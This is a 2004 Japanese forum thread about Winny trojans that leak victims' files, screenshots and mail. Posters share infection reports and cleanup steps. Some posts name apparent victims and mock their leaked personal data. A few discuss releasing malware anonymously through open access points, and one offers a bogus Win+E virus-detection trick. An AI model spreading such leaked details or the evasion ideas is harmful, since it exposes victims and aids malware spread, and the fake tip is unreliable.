をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

２、
改行を外して１行にする。

３、
１行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。

４、
Enterを押す（もしくは「移動」をクリックする）。

俺はこれをやって思わず笑ってしまったよｗｗ

[私には好きな人がいます]は極悪だな。
HDD内のtxt、doc、xls、全部さらって行くぞ。

>>623
禿同。

>>626
あと、恥ずかしい.jpgもな。踏んだ兆候があったら情報くれ
（というか、流れてる件数は少ないから、危険ではあるが）
txtとしてCookie全部さらわれるのも、痛いと思うよ。

初代キンタマの直後の改変キンタマにも、そんな機能があったんだよな
そういえば、今度のは徹底的にさらっていくが。

>>619
こ○ねこで二種類あったか。それはしらなんだ………ちょっとまて。
10/29 104960 CRC32：F20CEC2Bはこ○ねこじゃなくてグ○グリ2だぞ。


で、藻前らにエサなんだが、shareで出ている？メルポがnyに輸入されて
いるらしいな。地引いていたmellpoが落ちてきた。

SCRはエラーのダイアログがでてすぐに終了するように見えるが、
タスクマネージャを見ると、文字化けした名前のプロセスが動いてるぞ。

こういう方法思いついた奴は天才だな

おっさんのデジカメ写真は
非常につまらん。

どっぷり漬かりらんくても必要な物ぐらい落とせばいいじゃん。
少しでも違法なもん落としてんなら全部クズだろ。

盗んだバイクを「かっこいいだろ」って自慢するようなもんだ。
あ、落としたVMのことね。

ぐりぐり2でも仙台GA感染しました
TBTBにてCRC算出
Name CRC32 Bytes
----------- -------- -------
AUTORUN.EXE F20CEC2B 104,960
------------------------------
Total 1 Files 104,960 Bytes
です。
まあ、Virtual PC で試したので実害はなしですがね

エロゲもアプリも単なるデータ
VMだけが特別だなんてアホはカエレ

お前が(・∀・)ｶｴﾚ!!

不用意にageる香具師も(・∀・)ｶｴﾚ!!

>>622
生石灰じゃん。

うはｗｗ仙台ギャラクシーエンジェルズで登録したら落ちてきまくりんぐｗｗｗｗ

Y井君よ、ウイルスセキュリティじゃ見つからないよ、先生にしましょうね

>>622
Limewire。
http://www.limewire.com/japanese/content/home.shtml
グヌテラ一派、Javaで書かれ、主にﾏｶｰが使用

追記
ｸﾞﾇﾃﾗなんで、落とす側も落とされる側も生IP丸出し
後、米でﾛﾘ一斉摘発の対象になったｿﾌﾄ

結論、最先端どころか時代遅れもいいとこ

感染者のデスクトップ画像やWinnyの「戦果」、さらにはメールの内容などをWinnyに
アップロードするトロイの木馬が発見された。
　11月初め、「[仙台ギャラクシーエンジェルズ] [俺のデスクトップ]」という共有名で、
デスクトップ画像などを、P2P型ファイル共有ソフトウェア「Winny」にアップロードする
トロイの木馬が発見された。

　感染者数はWinnyで判定する限り70名以上。今回はより深いプライバシーを漏洩する
タイプであるため、身に覚えのある人は早急にウイルススキャンを行う必要があるだろう。
なお、ITmediaから記事作成開始と同時にアンチウイルスベンダー各社に検体を提供しており、
対応パターンは順次提供されているようだ。

「お気に入り」と「メール」まで漏洩
　このトロイの木馬の動作には不明なところも多い。完全に判明しているわけではないが、
把握している限りでは以下のような挙動を示すようだ。番号ごとに動作の可能性は
減っていくと推測される。

ソース元： ITmedia
http://www.itmedia.co.jp/enterprise/articles/0411/05/news089.html

今更そんな記事

何が恐いって、感染した奴が
違法、エロ、オタ、２ちゃんなど
致命的な趣味嗜好を併せ持つのが
全部ばれてしまうことか…
もう止めるかな。

あんまり解り難いスレタイを付けられると、本格的にスレが寂びれ、重複スレが立つ危険がある。
、
それに、アホの妄言は脳内あぼーん推奨というのも大前提としてあるのを忘れてはいかんぞ。

正体不明な奴は、VPC上で走らせて確認、は、最低限の常識
万が一感染しても、仮想ｲﾒｰｼﾞで保存しておいたVPCを入れ替えで済むし

たったこれだけすらしな、面倒臭い事が嫌いな奴は自爆して当たり前
努力で回避出来る事すらしない奴は、辞めるべきだね

昨日の夜からの過程を一生懸命文章で書いてたんだが
作文力の無さに泣きそうになったんで形式変えますた。

色々頑張る→svchost32をリブートソフトとかいうので再起動時に消す
→暫く待ってもupフォルダに画面のアップは無かった

→but　コマンドを指定して実行で「regedit」と入力する→メモ帳が出る
→治す（上書き）方法を調べるも分からず
→「システムの復元」というコマンドで一週間くらい前に戻す
→regiditと入力するとちゃんと？レジストリエディタが出る
＋system32の中のsvchost32も以前消えたまま
→winnyのフォルダごと削除
→画面のアップは無し（というかupフォルダが作られていた大本のフォルダがもう無い）

補足
Ctrl+Alt+Delでタスクマネージャを起動して
プロセスタブを見るとsvchost32は無いもののsvchostは五つほどありました。

これで解決でFAで良いでしょうか？
まだ不安な点とか、最後の点検だけでもお助け下さい（´Д

>>647

(　ﾟдﾟ)ﾎﾟｶｰﾝ

>>650
ﾎﾟｶｰﾝついでに>>649頼んます（´Д

>>651

((((；ﾟДﾟ)))ｶﾞｸｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙﾌﾞﾙ












svchostは気にしなくていいよ、健全なシステムで常時稼働している物

>>649
偽名で動いてる場合もあるが、だとしたら既に手遅れだし。
実行ファイルの作成日や変更日も簡単に偽証できる。

つか、なんで初期化しないの？
ちょっとでも停めると業務に支障が出るようなマシンなのか？

>>648
仮想OSでテストしても、症状が具体的に出にくいウィルスだと危険だよ
今回の「私には、、」とか「ポート0、、」とかも発症条件があるみたいだし

>>649
感染源は何だった？

nao: あのね
きらり: はい
nao: 変態だって思わないでほしいんだけど
きらり: うん
nao: もしオマンコの穴が痛いんだったら
きらり: うん
nao: お尻を試してごらん

今となっては懐かしいフレーズだな。

鈴木広多君と山浦克也君はまだ気づいていないのかな？

柊のお姉ちゃんなかなか可愛いな
お母さん朝鮮顔なのに何で？

晒しはこっちでどうぞ
ここでやると情報が埋もれる

【仙台ギャラクシーエンジェルズ】Winny新ウィルス
http://tmp4.2ch.net/test/read.cgi/download/1099799904/

こういうプログラム組めるのが単純に凄いと関心してしまうのです。

デスクトップ画像をWinnyで流通させる正体不明のウイルス
〜ネットエージェント杉浦氏「開発者はほぼ特定」
http://internet.watch.impress.co.jp/cda/news/2004/11/08/5303.html

開発者ﾀｲ━||Φ|(|ﾟ|∀|ﾟ|)|Φ||━ﾎ!!!

ネットエージェントの言うことはどれをとっても信じられん

これに関しては、ただ名前売りたいだけやね。悪質。

逮捕ｷﾀ━━━(ﾟ∀ﾟ)━━━!!!!!

この会社はもう駄目だろうね

犯人はネットエージェント杉浦氏か

＞ネットエージェント杉浦氏「開発者はほぼ特定」

自作自演か

作者一般人だとして自分の家のPCから放流するか？

感染しているわけがないのに、ひたすら自分のユーザー名を打ち込んで検索する小心者の俺……。似たような名前のやつがヒットしてビビりまくった……orz。

最近、zipファイルを+Lhacaに持っていってもフォルダ出来るだけで中は空・・・・。
前まで解凍出来たものも出来なくなってる・・・・。　　　orz
これって亜種かな・・・？？

特定されますたか。
で、どうすんの？

どうやって特定すんだよ

ウイルスでP2P使用者が減ると製品が売れなくなるから
小一時間説教する気なんだろう

nyネットワーク上のあるファイルを最初に流したのは誰か特定できますよ、てことじゃね
ほぼってのは民間が特定できるのは人間じゃないからか

+Lhacaてウイルス対策されたかな？

結局、仙台の元は何に入ってたんだ？
グリグリ2とこんねこに入ってた1029のAutorun偽装が
2種類ってのは結構報告があるが、オリジナル？の
インストーラ偽装されてる1022物ってどれなんだろうか。

誰かの詰合せに入っていたよ>10/22

22日の夜作ったウイルスを24日に見つけたとしたら大したものなのだが、
マルウェア見つけてアンチウイルスベンダーに報告もせず放置しておいて
感染を広げるのは人としてどうだろうか？ﾄｶ ｲｯﾃﾐﾙ

パフォーマンスだな
実際逮捕してから言えと。
こいつはハッカージャパン愛読者のDQNだからな
ただのPCオタ。

>>671
パス付ZIPなんじゃないか？

今まで解凍出来たものが出来ないというのは解せんが、
+Lhacaはデラックス版じゃないとパス付ZIPは解凍出来ずに
フォルダだけ出来るよ。

つ〜か+Lhacaなんて使うな。

杉浦隆幸ことluminは、元エセハッカーだろ？
http://www.geocities.co.jp/SiliconValley/6281/

悪のマニュアルとか、書いてる奴の言う事が信じられるか。

仙台はSSからして、ｴﾛｹﾞｦﾀのようだが、私には好きな人がいますは、同一のｳｲﾙｽなのか？
Search.txt、Download.txtからして、別ルートの別のウィルスじゃないか？
別のものとすれば、どのルートから来たのか？特定されないと不安だ。

まぁ俺でも特定はできる
もしエロゲーのexe偽装が大元なら
まず犯人は光ファイバーでないとウィルスを拡散できない
さらにエロゲークラスタに近い人間だろう。

あとは頻繁にキンタマを検索してる人物だな。

アホでも特定できるぜｗ

一晩で24000ファイルか・・・
一週間以上気づかずずっと流してくれてるやつも居るな。

君のは特定じゃなくて推定だよ

>>685
ほぼ特定＝推定

特定できんのなら一緒。
糞個人企業はつぶれろやｗ
資産は１０００万だっけかｗ

346 名前：番組の途中ですが名無しです[] 投稿日：04/11/06 23:23:41 ID:0lVphXx/
ウィルスの簡単な判別方法見つけたけどいるか？
それ使うと常駐型のウィルスしかわからないが動き出すときにわかるんだけど
とりあえず、張っておくか

解説
最近のウィルスの多様さには驚くべきものがある。
特に常駐型で外部に個人情報を送るウィルスは機密情報が漏れたりと被害が想像も出来ないことになったりもする。
そんな時に常駐型が存在するかを調べる方法を教えよう。

1.WINDOWSのキー（ウィンドウズのロゴのキー）と「E」キーを押しながら待つ

するとプログラムがプロセスを作るときにその内容がポップアップされる。
そのときに外部送信型のウィルスである場合　send　smtp等の文字がでた場合は要注意だ。
さらに、IPアドレスのようなものがあった場合はまさに外部に送ろうとしてる瞬間だ。
その場合はそのプログラムの場所を見て一時的に名前を変えておこう。

ホントに通報して逮捕まで持って行ったら少しは認めてやっても良いけど、
基本的にあそこは、ばれない嘘を本当の事っぽく言ってるだけだしな。
信憑性を持たせたかったら京都府Kに逮捕させてみろよと。

というわけで
↓またまたご冗談をのAA

俺なんかウイルスなんか自分にゃ無関係と思いながらWinnyやってて
OS飛ぶまでウイルスの存在に気づかなかった
それ以来ノートン入れるようになったわさ

ネットエージェントなんて全く信用してないが
オマエよりマシと思う

>>689
馬鹿もいいトコだな
で、今度は能登先生を信用しすぎて死ぬわけだな

svchostでCドライブを検索したら

svchost.exe　　　　　　C:\WINDOWS\system32
SVCHOST.EX_　.　　　C:\WINDOWS\i386
svchost.exe　　　　　　C:\WINDOWS\SoftwareDistribution\Download\1d6fa39895dfc1d3756b5510bca8c7f4

の3つが出たんですがまとめサイトでsystem内のsvchostは問題ないとの事でしたが
残りの二つは削除したほうがいいのでしょうか？
ウイルスバスターではウイルスの検出はありませんでした。

…ふぅ〜…

ちゃんと読もうや
>>460

>>692
ウイルスバスター嘘付かない。

>>692
http://headlines.yahoo.co.jp/hl?a=20041107-00000708-reu-ent.view-000

>>692
これからも
┌|*゜o゜|┘よ┌|*゜0゜|┘ろ┌|*゜-゜|┘し┌|*゜。゜|┘く♪

＿|￣|○ 　調べてみたら大丈夫のようでした同じような内容が>>36にもありました
　　　　　　　　レズ汚してすみませんでした･･･

特定したら明らかにすればいいのに。
神になれるし、技術力の証明にもなるし。
いろんな絡みもあるかもしれないけど大きいほうでなく開発者だけしょっぴけばいい。

C:\wingoってフォルダができたんだがコレはキンタマなのか？

ノートンを使ってスキャンしたが無反応
だが、wingoフォルダにはnyのTXTが移ってた(ほかにもIEのキャッシュ等
同症状が出て解決した方いたら情報キボン

http://www.symantec.com/region/jp/avcenter/venc/data/[email protected]
これとの関連がありそうだが不明　むろんノートン無反応

当方nyはほとんど使ったことがないんだがキンタマを1日ぐらいにどんなものかと落として大量のスペースのあとに拡張子がついたファイルも見た可能性が皆無ではない

なるほど

>>700
ウイルスバスター嘘付かない。

ネットエージェントがIPから個人名を特定できるわけないだろ。
裁判所にISPへ開示命令出してもらわないとダメなんだから。

仮に「ほぼ特定」というのが本当だとしても、それはIPレベルの話だろ。
警察にそのIPを教えてるかどうかは不明だけど、調査したらネットカフェから…
という可能性もある。だから「ほぼ」なんだろ。

犯人見付けるのはネットエージェントの仕事じゃないから、
IPを特定するような解析はやってないんじゃないかな。
ていうか、IPレベルの話だとしても特定なんて可能なのか？
「恐らくこのISP会員が犯人」くらいなんじゃないの？

バスターノートンだろうがC:\wingoがなんなのかが問題
嘘ついていようがいまいが関係ない

なるほどなるほど

>>704
そこまで考えが回るとはエロイなお前、研究者にでもなったらどうだ

PCルームの使用に学生証の提示が必要ない、管理の甘い大学とかから放流するとか？

犯人をほぼ特定した、なんて言ったら、犯人がアクション起こしちゃうじゃないか。
逃げるとか、証拠湮滅するとか、自首するとか。

ブラフでほぼ特定と言って、犯人が自首しちゃったら、大笑いだぞ。

仙台の画像たくさんもってるんだけど、間違えられてﾀｲｰﾎとかないだろうな？
俺はおもしろウイルスが好きなだけなんだけれども・・・

>>707
それはログインにユーザIDが必要ないことが前提になってしまわないか？

いったいどういう容疑がかかるというのか？

抵触する法律はあるのか
開き直って被害届出す香具師は現れるのか

wingoはシステムフォルダだよ

>>707
そこまでしなくても、野良APが探せばいくらでも見つかる。
そういうところはたいてい共有管理も甘いから、ny仕込んで
自動起動にしてあらかじめ用意したウイルス入りキャッシュ
も入れておいたら、ウイルス放流ノードにならないか？

>>709
誤認逮捕されたら釈放後
鬼の首とったが如く騒いで2chで神になれるぞ









　　　　　　　　　PCの中が清廉潔白であればな

>>713
すくなくとも最近まではなかったし　情報がまったくないのでその可能性はまずないと思ってる
もし情報元があるのなら教えて欲しい　そうでなければ信憑性にかける

８ｷﾀﾜｧ*･゜ﾟ･*:.｡..｡.:*･゜(n‘∀‘)ηﾟ･*:.｡. .｡.:*･゜ﾟ･* !!!!!

>>707
・・・それやられると、かなり簡単に完全犯罪できちゃうね。

(((( ；ﾟДﾟ))))

失礼。
×　>>707
○　>>714

　 　　　　　||
　　　　　∧||∧
　　　　（ / ⌒ヽ 　すみません・・・誤爆してしまいました・・・　
　　　　　| | 　　|
　　　　　∪ / ノ
　　　　　 | ｜|
　　　　　 ∪∪

そもそも会員証のいらない
ネットカフェですればいいじゃん

>>721
ネカフェは監視カメラあるところが多いし、大学もそう。
>>714が安全な放流方法のFAっぽい。

>>721
ネカフェは監視カメラで記録取られてること多いよ。
どこかのサイトで、PCの吸気スロットに隠しカメラが仕込まれ
てたって元バイトが暴露してた。

変装していかないといけないのか

パンツカぶっていけばOKじゃない？

>>725
間違いなく別の意味で捕まるな。

>>725
サンクス、さっそく買ってくるよ

antiny Hってなに？

>>727
わざわざ新しいの買わなくても手持ちのパンツでOKですよ。

[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] tarte (画像詰め合わせ）.zip
このファイルが完全キャッシュとしてあったんで変換しました。
中にはｊｐｇだけでした。ｅｘｅでもｓｃｒでもないのでクリックしても安全ですか？

ハードディスクのデータが消える。ウィルスチェックしてもひっかからない。
なんなんだ！！！！！！！キャッシュ消えるし、どうすれば？

>>730
そんなことも分からないならｎｙ止めろよ(　´,_ゝ`)ﾌﾟｯ

厨はこっちで騒いでろｗ

【仙台ギャラクシーエンジェルズ】Winny新ウィルス
http://tmp4.2ch.net/test/read.cgi/download/1099799904/l50

>>730
これ以上Ny続けたら地獄に落ちるわよ
あしたからShareにしなさい

定義ファイルに登録されてなければ引っ掛かるワケないじゃん

状況簡単まとめ
・元祖仙台キンタマ
　　こん○こ、と、グ○グリ2に混在（もう1本亜種があるらしい）→先生がSillyP2Pとして対策済
　　壁紙を赤くする、ファイル詰め合わせ放流、SS放流、ny関連のtxtから情報抽出して放流
・なんだか不明（人為的？ 時限発動？）
　　仙台キンタマのSS詰め合わせを（画像詰め合わせ）として放流
・［私には好きな…］［私はポート0設定…］
　　.xls、.doc、.txt、.jpg、を全サーチして詰め合わせにして放流
　　仙台キンタマ放流と同等の詰め合わせ（女性名、トリップ無し）に混在の.scrか？
　　しかし、放流機能なし。結論。本体特定されず、詳細不明

* ネットエージェントの発言は信じらんね。50件感染どころか、もっといますがな…

　なお、トレンドマイクロやシマンテックでは11月初旬にこのウイルスを認識。
詳細については不明だが、トレンドマイクロでは「WORM_ANTINNY.P」、
シマンテックでは「W32.SillyP2P」とし、それぞれウイルス定義ファイル上の対応は完了済みだという。

>>735
一番最初は、エロゲのホットギミックフォーエバーのｆｉｌｅｓだったはずだが・・・ま、どうでもいい

wingoフォルダの中身みてもまだこんな所で
呑気に質問なんかしてる椰子って一体・・・

norton入れてるからもう安心だな。
さっそくグリグリ２を落とすとしよう。

過信はすんなよ

どのグリグリ２が当りなんだろうな(・∀・)ﾆﾔﾆﾔ

古いPCでノーガード戦法やってるけど、感染しない(ﾉ-_-)ﾉ ~┻━┻
XPじゃなきゃ感染しないの？
つまんねぇぇぇぇぇぇぇぇぇぇ！

大学生協の展示PCとかならいとも簡単に？

[仙台ギャラクシーエンジェルズ] [俺のデスクトップ] だけど。
昨日の夜9時から今まで、キーワードを登録して放置していたんだが。
すでにファイル数17887、容量2.25GBになっちゃった。

キャッシュ容量は40GBで余裕があるから、ダブりはないはず。

既に感染済みです。

てかexeファイル起動するやつはどういう神経してんだ…

>>746
ﾉｼ

その場のいきおいかな…。
止まれない時ってヤツがあるんだよ…。

なんかおもしろそうだな

つーか明らかに「女性の名前」語ってるの怪しい
コンピュータの名前に「さとみ」とか「えみ」とか変だって

すぐ引っかかるところをみると

需　要　有りみたいですね。名前で人気度わかるなぁ。

>>748
エロゲとかアニメとかのキャラ名付けてるんじゃないのか？

>>746
だってゲームなんかはexe起動しなきゃしょうがないやん。

>>750
ディスクイメージの中身を編集してアイコン偽装してexe差し替えてたりするのか、これ？

ちなみに一番多い名前が、Ownerだな。つぎがAdministrator。
この2つだけは偶然ファイル名がダブル場合があるようだ。ファイルサイズは違うけど。

つうかROやってる香具師が異様に多いな。
ま、RO厨は、こういうのにすぐに引っかかるアフォばかりだしな。

むかつく奴の名前で感染さ！

だけどファイルは自分の個人情報なんだろｗ

嘘ファイルで固めれば悪意有る放流も可能だろうね…
案外そっちの方が厄介なのかも。

tarteのが大杉
ROやってるやつ、誰かこいつに教えてやれよ

つーかこのスレ偽装レスが多いなｗ　

やっぱエロゲクラスタだとかなり引っかかるのかね
うちはﾍﾟﾊﾟｰﾘだから200くらいです

このスレ面白いな

つーかｅｘｅなんか踏むなよ

>>761
だってゲームなんかはexe起動しなきゃしょうがないやん。

>>698
レズかよｗ

［私には好きな…］［私はポート0設定…］についての情報収集継続中

誰か、特攻してくれるという奇特な人がいたら、ユーザー名を【特攻】とかにして、
元祖仙台キンタマと、例の.scr偽装ものとの重複感染してくれないかな？



とか、無理ッぽいお願いをしてみる（スタンドアロンで試してるが症状出ないし）。

背徳または破廉恥な行為のある人、
徳義または法律に違反した行為をなした者であっても、
当然に名誉毀損罪の被害者となりうる。

これ常識。非常に興味深いからさらされた人、告訴して。
被疑者不明で。
名誉毀損幇助なんて聞いたこともないので検察が公訴してくれないかな。
著作権違反なんて所詮経済犯罪・・・人権侵害のが重い。
70人もいれば「仙台キンタマ被害者の会ｗ」も出来るでしょ。
なんせ身元はそれぞれわかってるわけだし。

名誉毀損で泣き寝入りしないために http://www.geocities.jp/meiyomamoru/
素人でも行きやすいようにｈ〜からはじめました。

>>764
元祖仙台キンタマは持ってるけど.scr偽装の奴がない……。

あれば特攻してやってもいいんだが。

ネットエージェント杉浦氏「感染経路などにより、開発者はほぼ特定」

タイーホ5秒前

>>767
こいつの発言は当てにならん

>>765
自分で踏んで訴えればいいじゃん

649で報告したものですが、その後も順調って感じです。
ある意味upフォルダの悪さ具合が見れないのでny抹消したのは
速断だったかもしれませんが。
再起動してもレジストリはちゃんと出るし、
svchost32が復活する様子も無いです。

トレンドマイクロの新しく対応したファイルは念のために入れておいた方が
良いですか？

>>652
ありがとうございました。名前が似ていたので不安でした。

>>653
初期化は環境ゆえ不可能でした。

>>655
エロゲです。今思うとそう言えば…って場面があったかも。
ｲﾝｽｺ後に変なエラーが出続けたゲームがありました。
詳しいことは覚えていませんが。
ただグリグリ２とこんなんとかってのは違いました。
10月下旬から逆算して三つの候補がありますがそれは勘弁して下さい。

[041108-1237][無修正][[DVDISO](DVDISO)DVDISO][ナルト][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

これ、中にメールアカウントのIDとPASSとか色々入ってるよ
ワロタ

あんまり詳しく知らんのだが、ny環境下で、下記のような
monitorとかtransfer、whoisログを吐くツールってないよね？

2004/11/02 03:24:10DL開始******* ***************.avi
2004/11/02 03:24:14DL計測開始******** *************.avi
2004/11/02 03:38:24DL切断******* ************.avi
2004/11/02 05:06:58UL完了******* ************.avi

ってことは、［私には好きな…］［私はポート0設定…］は感染源が ShareとかMXだったり
するのかなぁ…え、それでny上に流すのかぁ？

勘弁して下さい

ワラタ

ウイルス作成罪が施行（まだ国会提出もされてないが）
される前にやっちゃおうとしたのかもね。
電子計算機損壊等業務妨害罪とかは企業相手だし
コンピ破壊しない単なるワームとかじゃ器物損壊も適用ないしね、
このウイルスだと名誉毀損の幇助ってのが無理やり適用できそう。
作成者がファイルＵＰしなくてもほかの人間の手助けってね。
つーか被害者団結してくれないと警察も動きにくいから。
ほんとはバリバリ取り締まりたいんだから。

ていうかPC1台でXPでIEでOEな環境でNyやってる奴がほとんどなのかね
まさにウィルスウェルカムですな

>>769
それじゃおそらく継続しがたい。
だからもっと人数が必要なの。
それに身分明かすわけには行かない。

>>775
うわー俺だーってか

まあそんな環境でも、感染しない奴は感染しない罠

>>774
まずは手始めに、面白半分で個人情報の拡散に協力している >>771 みたいのを
しょっぴいて欲しいな。

また「原告はお尻ぷりんセスのディスクイメージをダウンロード、マウントして実行」とかなっちゃうじゃないか

>>778
キンタマ被害者乙ｗｗｗ

svchost32.exeと
svchost.exeは違うの？
問題は前者？？

またまた登場

>>781
　　／il||/〃//／／,,.-''"´　　｀ミミミミﾐﾐヾヾ､ヾ､ヾ､ヾ､`'''ー─‐
　 ,r=ﾐ､|i川〃／　　　　　　　　　　ミミミミﾐﾐヾヾヾヾヾ､ヾ､＼`''＝
　.!il|ﾞ'7ヾilil/　　　　　　　　　　　　　三三ミミﾐﾐﾐヾヾ;ヾ;ヾ､;ヾヽ､;=
　 ヾ,/　 V　　　　　　　　　　　　　　三三ミミミミﾐﾐ;ヾヾ､;;ヾ;;ゞ=三
　　 .!　　　　　　　　,.,;:;';';';';,,..　　 　 三三ミミミミミﾐヾ;､ゝ;;､ヾ;;;､=;
　　 |　　　　　　　　　　　　　　　　≦三三ミミミミミﾐﾐ､ヾ;;､ヾ;､;;;≡
　　 |　 二三彡'　　　　 ,..,,,;;=''""ﾞ　　ヾミﾐミミミミミﾐﾐﾐヾ;;;､`二三
　　,iﾞi､　ﾞ'''‐ '"　　　,,.;;シ"　 __,.ｨ　　　 iミミﾐﾐヾ､ヾ;､ヾ;;､;ヾ､;`＝=;
　　 ヾミ;､　 　 _,,,;彡ｼ　_ｨ;;;oﾟ;;/ ,.,.,.;:;:　ﾞ!ﾐ;iミﾐヾ､ヾ;:､ヾ;;ヾ;;;､`=;三
　　　 ﾞi_ヾﾐ､　ﾞi;;彡'"/´_,ゞ-''",,;';;';';'ﾞ"　ﾞ!ﾞi､ゞ)ヾﾒ;;ヾ;;､;;ﾞヾ;､ﾞヾ;;､､;
　　　 `i､_(;;ヽ　　 ﾞ'''　　　''"ﾞ^　　　　　 ﾞ!ﾞi､ﾐく /ミﾐヾ;､;;ﾞヾ;､`＝三
　 　 　 ﾞif;　 i　　　　　　　　　　　　　　　iﾞi､;i;ノﾐヾ;;､ヾ;;､ゞ､ﾞ=≡三
　　　　　l,　 l　　　　　　　　　　　　　　　 iﾞ!;!;､ヾ;;;､ヾ;､ﾞヾ:;､｀ヾ;;､≡
　　　　　ﾞi, /　 　 ,.. ）　　　　　　　　　　　iﾞi;!､ﾐ､ﾞ､;;ヾ;;､;;ヾ､ヾ≡三
　　　　　 .ﾞi,ヽ--､ ヾ;;;;;;ｰ‐,,.､__　　　　　 ﾐﾐゞ､ヾ､;.-''^ﾞ＞､;`=三三
　　　　　　 /;;;､_ﾞ'＿＿_,二ス三ミ､ 　 　 》､ﾐ､ヾ:;､-''"´_o_,./o⌒ヽ
　　　 　 　 il;;i;! `ー一''"´　　　ヾﾐ;;;､ .／''^>､ミミﾐ､=､ヽ､_）! ,Ｘ∩､
　　　　　　 ﾞi;i;ﾞi,　　　　　　　　　 ヾﾐヾ､／-;;;;;;フ'´⌒ﾞヽ､　ヽ､_ﾉ´ﾞ
　　　　 　 　 ヾ;;!　　 　 　 　 　 ／,>､ﾐr;;/　／　　　　 　 ヽ,､o oﾞ´
　　　　　　　　　ﾞi;,.,.,.,. ,.,.,.,.,._,／／/ ,ハ;;| ./　　　 く　　　　 ﾞ!`''')ﾞ''i
　　　　　　　　　 i;:;l;i;;:i:;!i;:ﾞi;Y／ '-^ﾝ⌒);!/　　 　 　 　 　 　 |｀´,.-
　　　　　　　　　 ﾞi,;:ﾞi!;ゞ;:ゞ;ヾ;､r'⌒`,=､ヽ'　　　　 ど 　 　 　 |'´::::::
　　　　　　　　　　ヾ;､ヾ;;;ヾ､ミﾐヾ､(__,,,,.-|　　　 　 　 　 　 　 |:::::::::
　　　　　　　__,,,,,. -'-'一''''"´´::::::::::::::::::::::l　　　　 い 　 　 　 l:::::::::

>>781
ttp://www.google.com/search?num=100&as_qdr=all&as_occt=any&as_dt=i&ie=sjis&oe=sjis&lr=lang_ja&as_q=svchost32.exe
ワームかなにかかね
XP SP2の環境ではないファイル。

UpFolder.txtをセキュリティレベルで書込み禁止とかにすれば
感染してもnyにUpされることないんだよね？？
出来るのか分からんが。

>>785
意味ないよ。トロイが直接キャッシュ化して放流、放流後、キャッシュ削除
という場合もあるから（現確されてないがな、可能性はということで）

>>784
おまえ、なんでこのスレにいるの？

感染者の個人情報の中に職務経歴書なんてのがあったのだが

199X〜 XXXX製ホストコンピュータメンテナンス、汎用機に至るまでのハードウェアサポート業務
199X〜 ネットワークインテグレーション部門へ配属。XXXX製ネットワーク機器を中心とした、ネットワークインフラ構築

ダメすぎ…、P2Pで遊んでて、しかも感染するとは。XXXXのSIなんて信頼のかけらもないな(w

>>788
そんなもん入れたPCでnyやってんのか、すげえな
でも普通に可哀相だな

>>789
>>775みたいな奴がこういうのに引っかかるだよ

ITの記事見て、やべ漏れも感染したか！
とドキドキしながらチェックしてもたけど、なんとも無かった。
仕込まれていると思われるエロゲもダウソしてあった。
解凍のテストしただけで、まだPlayしてなかった。
Viva!　奇跡。
メール漏れたらやばいって。会社のメールも受信してんぜ。
恥ずかしくて首吊りものだってばよ。
メーラー変えようかな。

>>775で書かれてたみたいな奴　に訂正

つか………

アカウント晒した挙句に、出会い系へのカキコかよ

> いきなりこういう話しをするのも気が引けるんですけど、
> 出会い系サイトということで思い切って言ってみます。
> 実は奥手なのでいまだに童貞です。
> 初めての相手になって、いろいろ教えてもらえないでしょうか？

もう笑うしかないな

【仙台ギャラクシーエンジェルズ】Winny新ウィルス
http://tmp4.2ch.net/test/read.cgi/download/1099799904/

晒しは専用スレでやれって

>>775かよ！と思ってドッキリしてた俺

>>794
すまん、場の雰囲気に流されてしもた。深くまじめに反省。
のでID換えて出直してくる。

見ていて痛い。赤ちゃんの写真かわいいのにお母さんｎｙですか。三重大学の某君もｗ
保存していたﾊﾒ撮り画像を公開した人は、これからの人生どうするんだろう。
家具屋のご主人はすっかり有名人になったけど、今頃どうなっているんだろ。

何らかの方法でウイルス警告を出すプログラムって作れないのか？

例えば、システムに常駐してUpFolder.txtを監視して変更
された時にユーザに通知するとか。

>>798 頼んだ

>>799
俺は無理だ。
HSPちょっとかじった程度で本格的なプログラムなんぞ組めん。

>>797
せめて、感染源を突き止めて、先生たちに対応してもらうぐらいしかないか...
とは思ってるんだが、[私］シリーズの本体が分からんのよ。
それで晒されてる個人情報から、元祖仙台キンタマとの共通晒し項目を探そうとしてるんだが。

つい、個人情報見てて笑ってしまったりな…
まぁ漏れは被害者救済とか考えてないんで純粋な好奇心なんだけどよ

ダメージでは最強クラスだな、HDD全消しの方が遥かにましだ

何の対処もせず、ｽｷﾙも得ようとせずWinnyなんかやって感染してたら、それこそ自業自得だろ。
香田と同じだ。

Nortonウィルス定義　とりあえずベータ版で対応？
ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/rapidrelease/symrapidreleasedefsi32.exe

>>804　きれいに張り付かんかった・・・
f tp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/rapidrelease/symrapidreleasedefsi32.exe

携帯番号から絵描き板のIDからガンホーIDからなにから、、、

・・・・ま　た　ラ　グ　ナ　か　よ

>>735
> しかし、放流機能なし。
放流機能あるって。

WinnyのUpfolder.txtに、、詰め合わせを置く隠しフォルダを追加していくよ。

>>797
はめ撮りのヒントだけでも教えて

ぼちぼち騒ぎも収束気味だから次スレタイはどうでもよさそうね

>>809
ｽﾚﾀｲ変えたところで厨は来る。
>>1をこんな感じでﾃﾝﾌﾟﾚ読むように強調するぐらいでいいんじゃない。


Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
ここは『初心者の質問スレ』ではありません。
『質問はテンプレを読んでから』にして下さい。
読まずに質問しても『テンプレ嫁』と切り返されるだけです。
余裕があれば過去ログにも目を通してください。

>>804
ｻﾝｸｽ、それ適用したところ
例の トリップなし .scr偽装ものを、W32.HLLW.Antinny.G（キンタマ）として
先生が識別した。収束に向かうかな…

結局、仙台キンタマはブラフ、というか、仙台ギャラクシー〜といういかにも
野次馬が集まってきそうな餌で、それが放流した詰め合わせを狙って集まって
くる香具師を引っ掛けようとしたのが、女名トリップなしの詰め合わせ（.scr）ってことか。


手が込んできたな

仙台の女の名前の詰め合わせの.scrが、私の好きな人の感染源か？
キンタマのときも、あの手で、騙されていたので、今回は騙されなかった。
赤シャツの香具師の画像を何度もおがまされたっけｗ

雑魚共なら晒されても大したことないが、
俺が晒されたら新聞（ｒｙ

菊池？

おーい菊池、隠れてないでこっち来いよ〜

